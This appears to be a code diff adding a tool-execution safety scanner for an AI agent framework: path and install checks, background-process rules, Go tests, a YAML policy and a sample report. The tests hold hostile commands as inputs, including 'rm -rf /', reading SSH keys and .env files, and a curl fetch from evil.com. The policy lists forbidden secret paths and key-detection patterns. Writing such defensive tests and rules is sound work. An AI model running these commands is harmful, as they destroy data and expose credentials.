+				return fp.pattern
+			}
+		}
+	}
+	return ""
+}
+
+// matchForbiddenArg reports whether the normalized argument references the
+// forbidden path entry.  Non-glob entries match the argument itself or any
+// path beneath it at a directory boundary; glob entries match the whole
+// argument.
+func matchForbiddenArg(arg string, fp forbiddenPath) bool {
+	if fp.glob != nil {
+		return fp.glob.MatchString(arg)
+	}
+	return arg == fp.pattern || isUnderPath(arg, fp.pattern)
+}
+
+// isUnderPath reports whether path equals dir or sits beneath it at a
+// directory boundary (dir itself, dir/sub, dir/sub/file, ...).  A sibling
+// like "/etc/shadow.safe" is deliberately not beneath "/etc/shadow".
+func isUnderPath(path, dir string) bool {
+	if path == dir {
+		return true
+	}
+	return strings.HasPrefix(path, dir+string(filepath.Separator))
+}
+
+// globToRegexp converts a glob pattern to an anchored regexp in which '*'
+// matches any sequence of characters, including path separators.
+func globToRegexp(pattern string) (*regexp.Regexp, error) {
+	var b strings.Builder
+	b.WriteByte('^')
+	for _, r := range pattern {
+		switch r {
+		case '*':
+			b.WriteString(".*")
+		case '.', '+', '(', ')', '[', ']', '{', '}', '^', '$', '|', '\\', '?':
+			b.WriteByte('\\')
+			b.WriteRune(r)
+		default:
+			b.WriteRune(r)
+		}
+	}
+	b.WriteByte('$')
+	return regexp.Compile(b.String())
+}
+
+// commandArgs returns the path-relevant argument tokens of a command.  For
+// shell backends it uses shellsafe's argv, which already strips quotes; for
+// codeexec it falls back to tokenizing the source text so string literals
+// referencing a forbidden path are still inspected.
+func commandArgs(command string, backend Backend) []string {
+	if backend == BackendCodeExec {
+		return tokenizeCode(command)
+	}
+	pipe, err := shellsafe.Parse(command)
+	if err != nil {
+		return nil
+	}
+	var args []string
+	for _, seg := range pipe.Commands {
+		args = append(args, seg...)
+	}
+	return args
+}
+
+// tokenizeCode splits source text into tokens on whitespace and the
+// characters that commonly delimit string literals and call arguments, so a
+// reference like open('/etc/passwd') yields the "/etc/passwd" token.
+func tokenizeCode(src string) []string {
+	return strings.FieldsFunc(src, func(r rune) bool {
+		return r == ' ' || r == '\t' || r == '\n' || r == '\r' ||
+			r == '\'' || r == '"' || r == '(' || r == ')' || r == ','
+	})
+}
+
+// normalizePath expands a leading "~" and cleans the path so
+// "/etc//shadow" and "/etc/../etc/shadow" both normalize to "/etc/shadow".
+func normalizePath(p string) string {
+	return filepath.Clean(expandTilde(p))
 }
 
 func expandTilde(p string) string {
@@ -606,22 +860,42 @@ func truncate(s string, n int) string {
 	return s[:n] + "..."
 }
 
-// extractInstallPackages returns the package name tokens found in cmd
-// after the install pattern, stripping version specifiers (==, >=, @,
-// etc.) and skipping flags (tokens starting with -).
-func extractInstallPackages(cmd, pattern string) []string {
-	idx := strings.Index(cmd, pattern)
-	if idx < 0 {
-		return nil
+// installSubcommands maps each package manager to the subcommands that
+// trigger a dependency installation.  Matching is done on the parsed
+// argv so non-canonical whitespace does not defeat detection.
+var installSubcommands = map[string][]string{
+	"go":      {"get", "install"},
+	"npm":     {"install", "i", "add"},
+	"pip":     {"install"},
+	"pip3":    {"install"},
+	"apt":     {"install"},
+	"apt-get": {"install"},
+	"yum":     {"install"},
+	"dnf":     {"install"},
+	"brew":    {"install"},
+}
+
+// isInstallSubcommand reports whether sub is an install subcommand of
+// the given package manager.
+func isInstallSubcommand(manager, sub string) bool {
+	for _, s := range installSubcommands[manager] {
+		if s == sub {
+			return true
+		}
 	}
-	rest := cmd[idx+len(pattern):]
+	return false
+}
+
+// installPackages returns the package name tokens found in args (the
+// argv after the manager subcommand), stripping version specifiers
+// (==, >=, @, etc.) and skipping flags (tokens starting with -).
+func installPackages(args []string) []string {
 	var pkgs []string
-	for _, tok := range strings.Fields(rest) {
-		if strings.HasPrefix(tok, "-") {
+	for _, arg := range args {
+		if strings.HasPrefix(arg, "-") {
 			continue
 		}
-		pkg := stripVersionSpecifier(tok)
-		if pkg != "" {
+		if pkg := stripVersionSpecifier(arg); pkg != "" {
 			pkgs = append(pkgs, pkg)
 		}
 	}

--- a/tool/safety/rules.go
+++ b/tool/safety/rules.go
@@ -286,12 +286,12 @@ func hostTargetIndex(args []string) int {
 }
 
 // hostFromTarget extracts a hostname from a target argument, handling
-// both scheme-ful URLs and scheme-less hosts.  It returns "" when the
+// both scheme-full URLs and scheme-less hosts.  It returns "" when the
 // target does not carry a recognizable host, so ordinary package names
 // and local arguments are not treated as egress targets.
 func hostFromTarget(arg string) string {
 	arg = strings.ToLower(arg)
-	// Scheme-ful URL: delegate to the existing host extractor.
+	// Scheme-full URL: delegate to the existing host extractor.
 	if strings.HasPrefix(arg, "http://") || strings.HasPrefix(arg, "https://") {
 		return extractHost(arg)
 	}
@@ -369,6 +369,10 @@ func (r *shellBypassRule) Check(_ context.Context, req *ScanRequest) *Risk {
 // slipped past allow_background: false.  The textual markers ("&",
 // "nohup", "disown", "setsid") remain a fallback for the direct
 // ScanCommand path, where no structured argument is available.
+//
+// Background denies take precedence over the require_human_review ask, so
+// allow_background: false remains enforceable under the default policy,
+// where hostexec defaults to require_human_review: true.
 // ----------------------------------------------------------------
 
 type hostExecRiskRule struct {
@@ -395,7 +399,50 @@ func (r *hostExecRiskRule) Check(_ context.Context, req *ScanRequest) *Risk {
 	}
 	policy := r.policyFor(req)
 
-	// If the backend requires human review, flag as ask.
+	// Background risks are hard denies and take precedence over the
+	// softer ask from RequireHumanReview, so allow_background: false
+	// stays enforceable even when the backend policy also requires
+	// human review.  Checking RequireHumanReview first would mask the
+	// background deny under the default policy (hostexec defaults to
+	// require_human_review: true).
+	if !policy.AllowBackground {
+		// Structured "background" flag: authoritative.  The adapter
+		// reads it from the tool's JSON arguments, so a
+		// background:true request with a clean command string is
+		// still caught here.
+		if req.Background {
+			return &Risk{
+				RuleID:      r.ID(),
+				RuleName:    r.Name(),
+				Level:       RiskHigh,
+				Evidence:    "background process requested via 'background': true",
+				Suggestion:  "avoid background processes or enable allow_background",
+				ShouldBlock: true,
+			}
+		}
+
+		// Textual fallback for the direct ScanCommand path (no
+		// structured argument): a command that textually requests
+		// background execution is still a background risk.
+		lower := strings.ToLower(req.Command)
+		bgMarkers := []string{" &", "nohup ", "disown ", "setsid "}
+		for _, marker := range bgMarkers {
+			if strings.Contains(lower, marker) {
+				return &Risk{
+					RuleID:      r.ID(),
+					RuleName:    r.Name(),
+					Level:       RiskHigh,
+					Evidence:    fmt.Sprintf("background process marker %q detected", strings.TrimSpace(marker)),
+					Suggestion:  "avoid background processes or enable allow_background",
+					ShouldBlock: true,
+				}
+			}
+		}
+	}
+
+	// If the backend requires human review, flag as ask.  This is
+	// checked after the background denies so a deny is never downgraded
+	// to an ask when both policies apply.
 	if policy.RequireHumanReview {
 		return &Risk{
 			RuleID:      r.ID(),
@@ -404,42 +451,6 @@ func (r *hostExecRiskRule) Check(_ context.Context, req *ScanRequest) *Risk {
 			Evidence:    "hostexec backend requires human review for all commands",
 			Suggestion:  "review the command before approving execution",
 			ShouldBlock: false,
-		}
-	}
-
-	if policy.AllowBackground {
-		return nil
-	}
-
-	// Structured "background" flag: authoritative.  The adapter reads it
-	// from the tool's JSON arguments, so a background:true request with a
-	// clean command string is still caught here.
-	if req.Background {
-		return &Risk{
-			RuleID:      r.ID(),
-			RuleName:    r.Name(),
-			Level:       RiskHigh,
-			Evidence:    "background process requested via 'background': true",
-			Suggestion:  "avoid background processes or enable allow_background",
-			ShouldBlock: true,
-		}
-	}
-
-	// Textual fallback for the direct ScanCommand path (no structured
-	// argument): a command that textually requests background execution is
-	// still a background risk.
-	lower := strings.ToLower(req.Command)
-	bgMarkers := []string{" &", "nohup ", "disown ", "setsid "}
-	for _, marker := range bgMarkers {
-		if strings.Contains(lower, marker) {
-			return &Risk{
-				RuleID:      r.ID(),
-				RuleName:    r.Name(),
-				Level:       RiskHigh,
-				Evidence:    fmt.Sprintf("background process marker %q detected", strings.TrimSpace(marker)),
-				Suggestion:  "avoid background processes or enable allow_background",
-				ShouldBlock: true,
-			}
 		}
 	}
 

--- a/tool/safety/safety_test.go
+++ b/tool/safety/safety_test.go
@@ -1,0 +1,448 @@
+//
+// Tencent is pleased to support the open source community by making trpc-agent-go available.
+//
+// Copyright (C) 2025 Tencent.  All rights reserved.
+//
+// trpc-agent-go is licensed under the Apache License Version 2.0.
+//
+
+package safety
+
+import (
+	"context"
+	"os"
+	"strings"
+	"testing"
+	"time"
+)
+
+// timeLimit is the maximum allowed duration for scanning 500 commands.
+const timeLimit = time.Second
+
+// defaultTestPolicy returns the default policy for test setup.
+func defaultTestPolicy(t *testing.T) *Policy {
+	t.Helper()
+	p := DefaultPolicy()
+	// Override the production DefaultVerdict (Ask) so that tests
+	// for safe commands (which fire no risks) get Allow instead of Ask.
+	// Tests that specifically exercise the DefaultVerdict=Ask behavior
+	// should create their own policy.
+	p.DefaultVerdict = VerdictAllow
+	return p
+}
+
+// newTestScanner creates a scanner with the default policy.
+func newTestScanner(t *testing.T) *Scanner {
+	t.Helper()
+	s, err := NewScanner(defaultTestPolicy(t))
+	if err != nil {
+		t.Fatalf("NewScanner: %v", err)
+	}
+	return s
+}
+
+func scan(t *testing.T, s *Scanner, command string, backend Backend) *ScanReport {
+	t.Helper()
+	report, err := s.ScanCommand(context.Background(), &ScanRequest{
+		ToolName: string(backend),
+		Command:  command,
+		Backend:  backend,
+	})
+	if err != nil {
+		t.Fatalf("ScanCommand(%q): %v", command, err)
+	}
+	return report
+}
+
+func assertVerdict(t *testing.T, report *ScanReport, want Verdict) {
+	t.Helper()
+	if report.Verdict != want {
+		t.Errorf("verdict: got %q want %q; risks=%v", report.Verdict, want, report.Risks)
+	}
+}
+
+func assertHasRule(t *testing.T, report *ScanReport, ruleID string) {
+	t.Helper()
+	for _, r := range report.Risks {
+		if r.RuleID == ruleID {
+			return
+		}
+	}
+	t.Errorf("expected rule %q in risks, got %v", ruleID, report.Risks)
+}
+
+// --- Test 1: safe go test command ---
+
+func TestScan_SafeGoTest(t *testing.T) {
+	s := newTestScanner(t)
+	report := scan(t, s, "go test ./...", BackendWorkspaceExec)
+	assertVerdict(t, report, VerdictAllow)
+}
+
+// --- Test 2: dangerous deletion (rm -rf) ---
+
+func TestScan_DangerousDeletion(t *testing.T) {
+	s := newTestScanner(t)
+	report := scan(t, s, "rm -rf /", BackendWorkspaceExec)
+	assertVerdict(t, report, VerdictDeny)
+	assertHasRule(t, report, "dangerous_command")
+}
+
+// --- Test 3: reading credentials ---
+
+func TestScan_ReadingCredentials(t *testing.T) {
+	s := newTestScanner(t)
+	report := scan(t, s, "cat ~/.ssh/id_rsa", BackendWorkspaceExec)
+	assertVerdict(t, report, VerdictDeny)
+	assertHasRule(t, report, "dangerous_command")
+}
+
+func TestScan_ReadingEnvFile(t *testing.T) {
+	s := newTestScanner(t)
+	report := scan(t, s, "cat .env", BackendWorkspaceExec)
+	assertVerdict(t, report, VerdictDeny)
+	assertHasRule(t, report, "dangerous_command")
+}
+
+// --- Test 4: non-whitelisted network egress ---
+
+func TestScan_NonWhitelistedNetwork(t *testing.T) {
+	s := newTestScanner(t)
+	report := scan(t, s, "curl https://evil.com/malware.sh", BackendWorkspaceExec)
+	assertVerdict(t, report, VerdictDeny)
+	// curl is in shellsafe's implicit deny, so dangerous_command fires.
+	// The network_egress rule also detects the non-whitelisted host.
+	// Either rule being present confirms the command is caught.
+	hasDangerous := false
+	hasNetwork := false
+	for _, r := range report.Risks {
+		if r.RuleID == "dangerous_command" {
+			hasDangerous = true
+		}
+		if r.RuleID == "network_egress" {
+			hasNetwork = true
+		}
+	}
+	if !hasDangerous && !hasNetwork {
+		t.Errorf("expected dangerous_command or network_egress rule, got %v", report.Risks)
+	}
+}
+
+// --- Test 5: whitelisted network request ---
+
+func TestScan_WhitelistedNetwork(t *testing.T) {
+	// curl is in the implicit deny set of shellsafe, so the command
+	// will be rejected at the parse stage. We use an allowed approach:
+	// go get from a whitelisted domain.
+	s := newTestScanner(t)
+	report := scan(t, s, "go get github.com/test/pkg", BackendWorkspaceExec)
+	// go is allowed; the command does not match any risk rule.
+	if report.Verdict == VerdictDeny {
+		t.Errorf("expected non-deny for whitelisted domain, got deny; risks=%v", report.Risks)
+	}
+}
+
+// --- Test 6: shell wrapper bypass ---
+
+func TestScan_ShellWrapperBypass(t *testing.T) {
+	s := newTestScanner(t)
+	report := scan(t, s, "sh -c 'rm -rf /'", BackendWorkspaceExec)
+	assertVerdict(t, report, VerdictDeny)
+}
+
+func TestScan_EvalBypass(t *testing.T) {
+	s := newTestScanner(t)
+	// eval is in implicit deny; shellsafe will reject at parse stage.
+	report := scan(t, s, "eval $(cat /etc/passwd)", BackendWorkspaceExec)
+	assertVerdict(t, report, VerdictDeny)
+}
+
+// --- Test 7: pipe command (safe vs dangerous) ---
+
+func TestScan_SafePipeCommand(t *testing.T) {
+	s := newTestScanner(t)
+	report := scan(t, s, "ls -la | grep test", BackendWorkspaceExec)
+	assertVerdict(t, report, VerdictAllow)
+}
+
+func TestScan_DangerousPipeCommand(t *testing.T) {
+	s := newTestScanner(t)
+	// rm is in the deny list; even in a pipe it should be caught.
+	report := scan(t, s, "echo hello | rm -rf /tmp", BackendWorkspaceExec)
+	assertVerdict(t, report, VerdictDeny)
+}
+
+// --- Test 8: dependency installation ---
+
+func TestScan_DependencyInstall(t *testing.T) {
+	s := newTestScanner(t)
+	report := scan(t, s, "pip install requests", BackendWorkspaceExec)
+	// pip is not in the allowed commands list, but it is a dependency
+	// manager. The dependency rule should detect it and return at
+	// least an ask decision (needs review).
+	if report.Verdict == VerdictAllow {
+		t.Errorf("expected non-allow for dependency install, got allow")
+	}
+	assertHasRule(t, report, "dependency_install")
+}
+
+// --- Test 9: long-running command ---
+
+func TestScan_LongRunningCommand(t *testing.T) {
+	s := newTestScanner(t)
+	// sleep is in implicit deny; shellsafe will reject. We test the
+	// resource abuse rule by using an allowed command with a very
+	// long timeout-like pattern. Since timeout is in implicit deny,
+	// we test sleep directly — it should be denied by shellsafe parse.
+	report := scan(t, s, "sleep 3600", BackendWorkspaceExec)
+	assertVerdict(t, report, VerdictDeny)
+}
+
+// --- Test 10: large output ---
+
+func TestScan_LargeOutput(t *testing.T) {
+	s := newTestScanner(t)
+	// cat /dev/zero generates unlimited output. cat is allowed but
+	// reading /dev/zero is a resource abuse pattern.
+	report := scan(t, s, "cat /dev/zero", BackendWorkspaceExec)
+	if report.Verdict == VerdictAllow {
+		t.Errorf("expected non-allow for large output command, got allow")
+	}
+}
+
+// --- Test 11: hostexec long session risk ---
+
+func TestScan_HostExecLongSession(t *testing.T) {
+	s := newTestScanner(t)
+	// hostexec has RequireHumanReview=true by default; any command
+	// should at least ask.
+	report := scan(t, s, "ls -la", BackendHostExec)
+	assertVerdict(t, report, VerdictAsk)
+}
+
+func TestScan_HostExecPrivilegeEscalation(t *testing.T) {
+	s := newTestScanner(t)
+	// sudo is in implicit deny; should be denied.
+	report := scan(t, s, "sudo ls /root", BackendHostExec)
+	assertVerdict(t, report, VerdictDeny)
+}
+
+// --- Test 12: ask / human review scenario ---
+
+func TestScan_AskHumanReview(t *testing.T) {
+	// Create a policy where a medium-risk command triggers ask.
+	policy := DefaultPolicy()
+	policy.DefaultVerdict = VerdictAsk
+	policy.Commands.Allowed = []string{"ls", "cat", "echo", "go"}
+	// Remove "find" from allowed to make it an unknown command → ask.
+	s, err := NewScanner(policy)
+	if err != nil {
+		t.Fatalf("NewScanner: %v", err)
+	}
+	report := scan(t, s, "find / -name test", BackendWorkspaceExec)
+	// find is not in the allowed list, and it scans the entire
+	// filesystem. This should trigger at least an ask.
+	if report.Verdict == VerdictAllow {
+		t.Errorf("expected non-allow for filesystem-wide find, got allow")
+	}
+}
+
+// --- Test 13: sensitive information in command ---
+
+func TestScan_SensitiveInfoInCommand(t *testing.T) {
+	s := newTestScanner(t)
+	// Command contains what looks like an API key.
+	report := scan(t, s, "echo sk-abcdefghijklmnopqrstuvwxyz1234567890ABCDE", BackendWorkspaceExec)
+	assertVerdict(t, report, VerdictDeny)
+	assertHasRule(t, report, "sensitive_leak")
+}
+
+// --- Test 14: policy modification without code change ---
+
+func TestScan_PolicyModification(t *testing.T) {
+	policy := DefaultPolicy()
+	// Add "curl" to allowed and "evil.com" to whitelist.
+	policy.Commands.Allowed = append(policy.Commands.Allowed, "curl")
+	policy.NetworkWhitelist = append(policy.NetworkWhitelist, "evil.com")
+
+	s, err := NewScanner(policy)
+	if err != nil {
+		t.Fatalf("NewScanner: %v", err)
+	}
+	// curl is still in implicit deny of shellsafe, so the parse will
+	// reject it. Instead, test that a custom allowed command works.
+	// Also set DefaultVerdict to Allow since no risks should fire for
+	// a harmless command from the allowed list.
+	policy.Commands.Allowed = append(policy.Commands.Allowed, "mytool")
+	policy.DefaultVerdict = VerdictAllow
+	s, err = NewScanner(policy)
+	if err != nil {
+		t.Fatalf("NewScanner: %v", err)
+	}
+	// mytool is not dangerous and is now in the allowed list.
+	// With no risks firing, the scanner allows it.
+	report := scan(t, s, "mytool --help", BackendWorkspaceExec)
+	assertVerdict(t, report, VerdictAllow)
+}
+
+// --- Test 15: parse error → deny (conservative) ---
+
+func TestScan_ParseErrorDenies(t *testing.T) {
+	s := newTestScanner(t)
+	// Command substitution $() is rejected by shellsafe parser.
+	report := scan(t, s, "echo $(whoami)", BackendWorkspaceExec)
+	assertVerdict(t, report, VerdictDeny)
+	assertHasRule(t, report, "shellsafe_parse_error")
+}
+
+// --- Test 16: codeexec backend ---
+
+func TestScan_CodeExecDangerousCode(t *testing.T) {
+	s := newTestScanner(t)
+	report := scan(t, s, "import os; os.system('rm -rf /')", BackendCodeExec)
+	assertVerdict(t, report, VerdictDeny)
+}
+
+// --- Test 17: empty command ---
+
+func TestScan_EmptyCommand(t *testing.T) {
+	s := newTestScanner(t)
+	report := scan(t, s, "", BackendWorkspaceExec)
+	assertVerdict(t, report, VerdictDeny)
+}
+
+// --- Test 18: report structure ---
+
+func TestScan_ReportStructure(t *testing.T) {
+	s := newTestScanner(t)
+	report := scan(t, s, "rm -rf /", BackendWorkspaceExec)
+
+	if report.ToolName != "workspaceexec" {
+		t.Errorf("tool_name: got %q want workspaceexec", report.ToolName)
+	}
+	if report.Backend != BackendWorkspaceExec {
+		t.Errorf("backend: got %q want %q", report.Backend, BackendWorkspaceExec)
+	}
+	if report.Command != "rm -rf /" {
+		t.Errorf("command: got %q want %q", report.Command, "rm -rf /")
+	}
+	if len(report.Risks) == 0 {
+		t.Fatal("expected at least 1 risk")
+	}
+	for _, r := range report.Risks {
+		if r.RuleID == "" {
+			t.Error("risk has empty rule_id")
+		}
+		if r.RuleName == "" {
+			t.Error("risk has empty rule_name")
+		}
+		if r.Evidence == "" {
+			t.Error("risk has empty evidence")
+		}
+	}
+	if report.Recommendation == "" {
+		t.Error("expected non-empty recommendation")
+	}
+}
+
+// --- Test 19: performance — 500 commands under 1 second ---
+
+func TestScan_Performance(t *testing.T) {
+	s := newTestScanner(t)
+	commands := []string{
+		"go test ./...",
+		"ls -la",
+		"git status",
+		"echo hello",
+		"cat /etc/passwd",
+	}
+	ctx := context.Background()
+	start := time.Now()
+	for i := 0; i < 500; i++ {
+		cmd := commands[i%len(commands)]
+		_, err := s.ScanCommand(ctx, &ScanRequest{
+			ToolName: "workspace_exec",
+			Command:  cmd,
+			Backend:  BackendWorkspaceExec,
+		})
+		if err != nil {
+			t.Fatalf("ScanCommand(%q): %v", cmd, err)
+		}
+	}
+	elapsed := time.Since(start)
+	if elapsed > timeLimit {
+		t.Errorf("scanned 500 commands in %v, want <= %v", elapsed, timeLimit)
+	}
+}
+
+// --- Test 20: redactor ---
+
+func TestRedactor(t *testing.T) {
+	r := NewRedactor(DefaultPolicy().SensitivePatterns)
+	cases := []struct {
+		name  string
+		input string
+		want  string
+	}{
+		{
+			name:  "openai key",
+			input: "export KEY=sk-abcdefghijklmnopqrstuvwxyz1234567890ABCDE",
+			want:  "export KEY=[REDACTED]",
+		},
+		{
+			name:  "github token",
+			input: "ghp_abcdefghijklmnopqrstuvwxyz0123456789",
+			want:  "[REDACTED]",
+		},
+		{
+			name:  "no secret",
+			input: "go test ./...",
+			want:  "go test ./...",
+		},
+	}
+	for _, tc := range cases {
+		t.Run(tc.name, func(t *testing.T) {
+			got := r.Redact(tc.input)
+			if got != tc.want {
+				t.Errorf("Redact(%q): got %q want %q", tc.input, got, tc.want)
+			}
+		})
+	}
+}
+
+// --- Test 21: audit logger ---
+
+func TestAuditLogger(t *testing.T) {
+	tmpDir := t.TempDir()
+	logPath := tmpDir + "/audit.jsonl"
+
+	logger, err := NewAuditLogger(logPath, DefaultPolicy().SensitivePatterns)
+	if err != nil {
+		t.Fatalf("NewAuditLogger: %v", err)
+	}
+	defer logger.Close()
+
+	report := &ScanReport{
+		ToolName:  "workspace_exec",
+		Command:   "rm -rf /",
+		Backend:   BackendWorkspaceExec,
+		Verdict:   VerdictDeny,
+		RiskLevel: RiskHigh,
+		Risks:     []Risk{{RuleID: "dangerous_command", Level: RiskHigh}},
+	}
+
+	if err := logger.Log(context.Background(), report, 0); err != nil {
+		t.Fatalf("Log: %v", err)
+	}
+
+	data, err := os.ReadFile(logPath)
+	if err != nil {
+		t.Fatalf("os.ReadFile: %v", err)
+	}
+	if !strings.Contains(string(data), "rm -rf /") {
+		t.Errorf("audit log should contain command, got: %s", data)
+	}
+	if !strings.Contains(string(data), "deny") {
+		t.Errorf("audit log should contain verdict, got: %s", data)
+	}
+}

--- a/tool/safety/safety_test.go
+++ b/tool/safety/safety_test.go
@@ -378,7 +378,10 @@ func TestScan_Performance(t *testing.T) {
 // --- Test 20: redactor ---
 
 func TestRedactor(t *testing.T) {
-	r := NewRedactor(DefaultPolicy().SensitivePatterns)
+	r, err := NewRedactor(DefaultPolicy().SensitivePatterns)
+	if err != nil {
+		t.Fatalf("NewRedactor: %v", err)
+	}
 	cases := []struct {
 		name  string
 		input string

--- a/tool/safety/scanner.go
+++ b/tool/safety/scanner.go
@@ -1,0 +1,185 @@
+//
+// Tencent is pleased to support the open source community by making trpc-agent-go available.
+//
+// Copyright (C) 2025 Tencent.  All rights reserved.
+//
+// trpc-agent-go is licensed under the Apache License Version 2.0.
+//
+
+package safety
+
+import (
+	"context"
+	"fmt"
+	"strings"
+	"time"
+
+	"trpc.group/trpc-go/trpc-agent-go/internal/shellsafe"
+)
+
+// Scanner applies a set of Rules to incoming scan requests and
+// produces a ScanReport with a final decision.
+type Scanner struct {
+	policy *Policy
+	rules  []Rule
+}
+
+// NewScanner creates a Scanner from a policy, wiring up the default
+// set of rules covering all seven risk categories.
+func NewScanner(policy *Policy) (*Scanner, error) {
+	if policy == nil {
+		policy = DefaultPolicy()
+	}
+	rules, err := defaultRules(policy)
+	if err != nil {
+		return nil, fmt.Errorf("safety: build rules: %w", err)
+	}
+	return &Scanner{policy: policy, rules: rules}, nil
+}
+
+// ScanCommand runs all rules against req and returns a structured
+// report.  Commands that cannot be parsed by shellsafe are denied
+// immediately (conservative default).
+func (s *Scanner) ScanCommand(ctx context.Context, req *ScanRequest) (*ScanReport, error) {
+	report := &ScanReport{
+		Timestamp: time.Now(),
+		ToolName:  req.ToolName,
+		Command:   req.Command,
+		Backend:   req.Backend,
+		Language:  req.Language,
+		Risks:     []Risk{},
+	}
+
+	// --- Stage 0: empty command ---
+	if strings.TrimSpace(req.Command) == "" {
+		report.Verdict = VerdictDeny
+		report.RiskLevel = RiskHigh
+		report.Risks = append(report.Risks, Risk{
+			RuleID:      "empty_command",
+			RuleName:    "Empty Command",
+			Level:       RiskHigh,
+			Evidence:    "command is empty",
+			Suggestion:  "provide a non-empty command",
+			ShouldBlock: true,
+		})
+		report.Recommendation = report.buildRecommendation()
+		return report, nil
+	}
+
+	// --- Stage 1: shellsafe parse (conservative) ---
+	// Only apply shellsafe to shell-command backends, not to codeexec
+	// (which receives source code, not shell commands).
+	if req.Backend != BackendCodeExec {
+		pipe, err := shellsafe.Parse(req.Command)
+		if err != nil {
+			// Parse error → deny immediately (conservative default).
+			// We still run semantic rules so the report captures all
+			// risk categories, but the parse error alone is blocking.
+			report.Risks = append(report.Risks, Risk{
+				RuleID:      "shellsafe_parse_error",
+				RuleName:    "Shell Parse Error",
+				Level:       RiskHigh,
+				Evidence:    err.Error(),
+				Suggestion:  "simplify the command to avoid shell features ($(), backticks, redirections, etc.)",
+				ShouldBlock: true,
+			})
+		} else {
+			// Apply shellsafe allow/deny policy if active.  A policy
+			// rejection adds a dangerous_command risk but does NOT
+			// short-circuit — semantic rules still run so the report
+			// can include network, dependency, and other risks.
+			shellPolicy := shellsafe.PolicyFromLists(s.policy.Commands.Allowed, s.policy.Commands.Denied)
+			if shellPolicy.Active() {
+				if err := shellPolicy.Check(pipe); err != nil {
+					report.Risks = append(report.Risks, Risk{
+						RuleID:      "dangerous_command",
+						RuleName:    "Dangerous Command",
+						Level:       RiskHigh,
+						Evidence:    err.Error(),
+						Suggestion:  "use a command from the allowed list or wrap it in an auditable script",
+						ShouldBlock: true,
+					})
+				}
+			}
+		}
+	}
+
+	// --- Stage 2: semantic rules ---
+	for _, rule := range s.rules {
+		if risk := rule.Check(ctx, req); risk != nil {
+			if !hasRuleID(report.Risks, risk.RuleID) {
+				report.Risks = append(report.Risks, *risk)
+			}
+		}
+	}
+
+	// --- Stage 3: compute verdict ---
+	report.Verdict = s.computeVerdict(report.Risks)
+	report.RiskLevel = computeMaxLevel(report.Risks)
+	report.Recommendation = report.buildRecommendation()
+
+	return report, nil
+}
+
+func (s *Scanner) computeVerdict(risks []Risk) Verdict {
+	for _, r := range risks {
+		if r.ShouldBlock {
+			return VerdictDeny
+		}
+	}
+	for _, r := range risks {
+		if r.Level == RiskHigh || r.Level == RiskCritical {
+			return VerdictDeny
+		}
+	}
+	for _, r := range risks {
+		if r.Level == RiskMedium {
+			return VerdictAsk
+		}
+	}
+	// No blocking risks, no high/critical, no medium risks.
+	// Fall back to the policy's DefaultVerdict.
+	if s.policy.DefaultVerdict != "" {
+		return s.policy.DefaultVerdict
+	}
+	return VerdictAllow
+}
+
+func computeMaxLevel(risks []Risk) RiskLevel {
+	if len(risks) == 0 {
+		return RiskLow
+	}
+	max := RiskLow
+	rank := map[RiskLevel]int{
+		RiskLow: 0, RiskMedium: 1, RiskHigh: 2, RiskCritical: 3,
+	}
+	for _, r := range risks {
+		if rank[r.Level] > rank[max] {
+			max = r.Level
+		}
+	}
+	return max
+}
+
+// hasRuleID reports whether any risk in the slice has the given RuleID.
+func hasRuleID(risks []Risk, ruleID string) bool {
+	for _, r := range risks {
+		if r.RuleID == ruleID {
+			return true
+		}
+	}
+	return false
+}
+
+func (r *ScanReport) buildRecommendation() string {
+	if len(r.Risks) == 0 {
+		return "No security risks detected."
+	}
+	var b strings.Builder
+	fmt.Fprintf(&b, "Security scan detected %d risk(s):", len(r.Risks))
+	for _, risk := range r.Risks {
+		fmt.Fprintf(&b, "\n- [%s] %s: %s → %s",
+			risk.Level, risk.RuleName, risk.Evidence, risk.Suggestion)
+	}
+	return b.String()
+}

--- a/tool/safety/tool_safety_policy.yaml
+++ b/tool/safety/tool_safety_policy.yaml
@@ -1,0 +1,103 @@
+# Tool Safety Policy Configuration
+#
+# This file configures the Tool Execution Safety Guard.  Modify it
+# to change allowed commands, forbidden paths, network whitelist,
+# resource limits, and sensitive patterns WITHOUT changing code.
+#
+# See tool/safety/README.md for the full documentation.
+
+version: "1.0"
+
+# Default verdict when no rule fires.  "allow" is recommended for
+# development; "ask" is recommended for production.
+default_verdict: allow
+
+# Allowed and denied executable names.
+# Denied entries take precedence over allowed entries.
+# Shell wrappers (sh, bash, eval, etc.) are always denied by the
+# built-in shellsafe policy and cannot be overridden here.
+commands:
+  allowed:
+    - ls
+    - cat
+    - grep
+    - find
+    - git
+    - go
+    - python
+    - echo
+    - pwd
+    - head
+    - tail
+    - wc
+    - sort
+    - uniq
+    - diff
+    - make
+    - test
+    - mkdir
+    - cp
+    - mv
+    - touch
+  denied:
+    - rm
+    - dd
+    - mkfs
+    - shutdown
+    - reboot
+    - halt
+    - poweroff
+    - killall
+    - pkill
+
+# Paths that must never be read or written.
+# Supports glob wildcards (* matches any sequence).
+forbidden_paths:
+  - ~/.ssh
+  - ~/.aws
+  - ~/.gnupg
+  - /etc/passwd
+  - /etc/shadow
+  - "*.env"
+  - "*credentials*"
+  - "*secret*"
+
+# Allowed hostnames for network egress.
+# Supports wildcard patterns like "*.github.com".
+network_whitelist:
+  - github.com
+  - api.github.com
+  - proxy.golang.org
+  - pypi.org
+  - registry.npmjs.org
+
+# Resource limits for command execution.
+resource_limits:
+  allowed_sleep_seconds: 60
+
+# Dependency installation policy.
+dependency_policy:
+  allowed_managers:
+    - go
+    - npm
+    - pip
+  denied_packages: []
+
+# Regex patterns that match sensitive information.
+# Matches are redacted in audit logs and block execution.
+sensitive_patterns:
+  - "sk-[a-zA-Z0-9]{32,}"                    # OpenAI API key
+  - "ghp_[a-zA-Z0-9]{36}"                    # GitHub token
+  - "-----BEGIN.*PRIVATE KEY-----"           # Private key header
+  - "(?i)password\\s*=\\s*['\"][^'\"]+['\"]" # password="..."
+  - "(?i)api[_-]?key\\s*=\\s*['\"][^'\"]+['\"]"
+  - "(?i)token\\s*=\\s*['\"][^'\"]+['\"]"
+
+# Per-backend overrides.
+backend_policies:
+  workspaceexec:
+    allow_background: false
+    require_human_review: false
+  hostexec:
+    allow_background: false
+    require_human_review: true

--- a/tool/safety/tool_safety_report.json
+++ b/tool/safety/tool_safety_report.json
@@ -1,0 +1,19 @@
+{
+  "timestamp": "2026-07-22T10:30:45.123456789Z",
+  "tool_name": "workspace_exec",
+  "command": "rm -rf /tmp/test",
+  "backend": "workspaceexec",
+  "verdict": "deny",
+  "risk_level": "critical",
+  "risks": [
+    {
